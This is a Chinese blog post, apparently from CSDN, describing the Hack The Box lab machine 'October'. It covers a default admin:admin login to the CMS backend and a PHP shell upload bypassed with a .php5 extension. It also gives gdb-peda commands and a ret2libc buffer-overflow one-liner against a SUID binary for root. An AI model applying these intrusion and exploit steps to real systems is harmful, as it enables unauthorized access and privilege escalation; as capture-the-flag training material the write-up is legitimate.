Hack the box靶机 October

最新推荐文章于 2023-02-04 20:06:45 发布
最新推荐文章于 2023-02-04 20:06:45 发布
阅读量296 收藏 1
点赞数 1
分类专栏: Hack the box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38005854/article/details/106317632
版权

在这里插入图片描述在这里插入图片描述

搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????

在这里插入图片描述

有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限

在这里插入图片描述在这里插入图片描述

dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧

看了一晚上+一个白天
算是明白原理以及利用了

在这里插入图片描述

算了,直接贴传送门吧
国外大佬写的靶机教程
很详细

大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限

安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done

对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝

菜浪马废
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
hackthebox - october (考点:october cms安全)
冬萍子癸水
05-24 481
1 扫描 常规端口,22想到ssh登录,80进web搜集信息,nmap扫描里看到80运行着October CMS 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA) | 2048 16:08:68:51:d1:7b:07:5a:34:
Its_October walkthrough
weixin_44912169的博客
04-20 498
Its_October 靶机渗透试验 kali 192.168.1.106 靶机 192.168.1.116 靶机下载地址 https://www.vulnhub.com/entry/its-october-1,460/ 扫描靶机 nmap -sC -sV -A -o october-scan.txt 192.168.1.116 发现开启了ssh,http,mysql 浏览网页 ...
HackTheBox::October
aya3t的博客
10-11 94
HackTheBox::October
vulnhub:Its_October靶机
qq_43884092的博客
02-04 102
8080端口查看源码提示存在mynote.txt文件,获得账号:admin,密码:adminadmin2,在后台添加页面反弹shell,发现python3.7具有suid权限,提权方法:https://gtfobins.github.io/gtfobins/python/#suid
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
平台的核心功能包括:虚拟靶场:Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
Vulnhub靶机 it is october
菜浪马废的博客
04-24 736
靶机IP 192.168.0.150 配置:NET 之前一直配置不上IP的 这有教程 ports=$(nmap -p- --min-rate=1000 -sT -T4 192.168.0.107 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports -sT 192.168.0.107 ...
vulnhub靶机渗透 | It's October
PeterWuu的博客
04-24 1033
这个靶机也算是比较基础的了,整体考察个人基础能力。 上说话,多动手。 博主的文章编辑能力实在太差,就不弄那些标题第几步什么啥的了,直接渗透它。 靶机下载地址:https://download.vulnhub.com/itsoctober/Its_October.ova 开始: 提醒:如果发现和找不到IP,请翻下之前的文章有详解,这里就不细说了。 1.1 netdiscover、nmap来查找目标机...
No.98-HackTheBox-Linux-October-Walkthrough渗透学习
qq_34801745的博客
05-14 341
** HackTheBox-Linux-October-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/15 靶机难度:初级(4.3/10) 靶机发布日期:2017年10月30日 靶机描述: October is a fairly easy machine to gain an initial foothold on, however it presents a fair challenge for users who
hackthebox】【Challenges】【Cartographer】
大方子
02-01 989
一个来自HTB的web挑战   问题陈述是这样的“ 一些地下黑客正在开发一个新的命令和控制服务器。你能闯入并看看他们在做什么吗?“并提交flag   ==================================================================================== 打开页面如下   看下网页源代码   第一反应的话...
HacktheBox靶场之Backdoor 核心提炼
weixin_51339377的博客
04-21 2156
自勉一句话:思维比工具更重要 内网靶场Backdoor 主要方向1:信息搜集(对目标的端口 服务 网站等进行扫描) nmap普通扫描 端口开放80和22 nmap进行全端口扫描 多出来一个1337 nmap -sS -sC -p- --min-rate=5000 10.10.11.125 nmap漏洞模块的扫描:发现后台登录地址 以及用户admin 这里学习到 一般wordpress的后台登录地址都是域名下的wp-login.php nikto扫描工具没有发现什么...
Hack the box靶机 Tabby
菜浪马废的博客
09-21 387
开放80和8080 查看一下 点击news时发生错误 看见?file= 可能有文件包含 先修改/etc/hosts 把10.10.10.194 megahosting.htb加入 再次访问 可以成功访问了 接下来测试是否是文件包含漏洞 访问/etc/passwd 发现用户ash 8080上市tomcat9 访问/usr/share/tomcat9/etc/tomcat-users.xml tomcat登录账号 tomcat:$3cureP4s5w0rd123! 登录成功 tomcat.
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
hackthebox通关手记(持续更新)
weixin_34054931的博客
07-13 1005
简介: 花了点时间弄了几道题目。以前我是用windows渗透居多,在kali linux下渗透测试一直不怎么习惯。通过这几天做这些题目感觉顺手多了。有些题目脑洞也比较大,感觉很多也不适合于实际的环境 10.10.10.5 这题比较简单,ftp可以匿名登录并且可以put文件:anonymous,上传一句话或者是大马即可期间有一个问题就是:大马下的shell不能type root.txt我...
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1119
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
hack the box three
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值